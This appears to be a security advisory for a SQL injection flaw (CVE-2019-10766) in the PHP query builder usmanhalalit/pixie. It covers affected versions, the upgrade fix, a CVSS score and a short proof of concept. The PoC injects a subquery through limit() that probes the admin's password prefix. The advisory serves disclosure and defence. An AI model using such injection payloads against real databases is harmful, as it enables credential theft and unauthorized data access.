SQL Injection

Affecting usmanhalalit/pixie package, versions <1.0.3 || >=2.0.0, <2.0.2

Do your applications use this vulnerable package? Test your applications

Overview

usmanhalalit/pixie is a lightweight, expressive, framework agnostic query builder for PHP.

Affected versions of this package are vulnerable to SQL Injection. The library does not escape the limit() param.

PoC by Snyk Security Team

<?
require 'vendor/autoload.php';

$config = array(
    'driver' => 'pgsql',
    'host' => '127.0.0.1',
    'database' => 'postgres',
    'username' => 'postgres',
    'password' => ''
);
new \Pixie\Connection('pgsql', $config, 'QB');

$query = QB::table('notes')->limit('(SELECT COUNT(*) FROM users WHERE name=\'admin\' AND password LIKE \'P%\')');
$queryObj = $query->getQuery();

print_r($queryObj->getSql());
echo "\n";
print_r($query->get());

Remediation

Upgrade usmanhalalit/pixie to version 1.0.3, 2.0.2 or higher.

References

CVSS Score

9.4
high severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    Low
  • Integrity
    High
  • Availability
    High
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H/E:P/RL:O/RC:C
Credit
Snyk Research
CVE
CVE-2019-10766
CWE
CWE-89
Snyk ID
SNYK-PHP-USMANHALALITPIXIE-534879
Disclosed
28 Oct, 2019
Published
19 Nov, 2019